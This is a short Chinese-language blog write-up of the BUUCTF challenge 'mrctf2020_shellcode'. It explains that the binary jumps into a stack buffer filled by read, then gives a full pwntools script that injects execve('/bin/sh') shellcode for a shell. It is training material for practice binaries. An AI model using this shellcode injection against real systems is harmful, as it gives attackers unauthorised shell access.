BUUCTF--mrctf2020_shellcode1

这是一题64位的shellocde题,没啥花招入门题。看下保护:


有可执行的段。接着我们看看IDA:


主函数中无法反汇编,那么我们直接看汇编代码。其实很简单,通过系统调用执行puts函数,然后执行read函数。


正在我想如何覆盖返回地址的时候,发现题目直接帮你搞好了。取buf的的地址(栈上)然后跳转到buf位置执行代码。那么我们直接通过read函数构造shellcode就完成了:

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
io=process('./mrctf2020_shellcode')

shellcode = '''
    mov rbx,0x68732f6e69622f
    push rbx
    push rsp
    pop rdi
    xor esi,esi
    xor edx,edx
    push 0x3b
    pop rax
    syscall
'''


shellcode=asm(shellcode)

io.recvuntil("magic!")

io.sendline(shellcode)

io.interactive()

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-01-29 06:16:03       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-01-29 06:16:03       100 阅读
  3. 在Django里面运行非项目文件

    2024-01-29 06:16:03       82 阅读
  4. Python语言-面向对象

    2024-01-29 06:16:03       91 阅读

热门阅读

  1. 【极数系列】docker环境搭建Flink1.18版本(04)

    2024-01-29 06:16:03       47 阅读
  2. 12.如何将图像转化为矩阵形式

    2024-01-29 06:16:03       45 阅读
  3. STM32duino舵机控制-2

    2024-01-29 06:16:03       58 阅读
  4. JUC并发编程与源码分析学习笔记(三)

    2024-01-29 06:16:03       52 阅读
  5. 帧头不对齐的频段间载波聚合(interCA-NonAlignedFrame)

    2024-01-29 06:16:03       47 阅读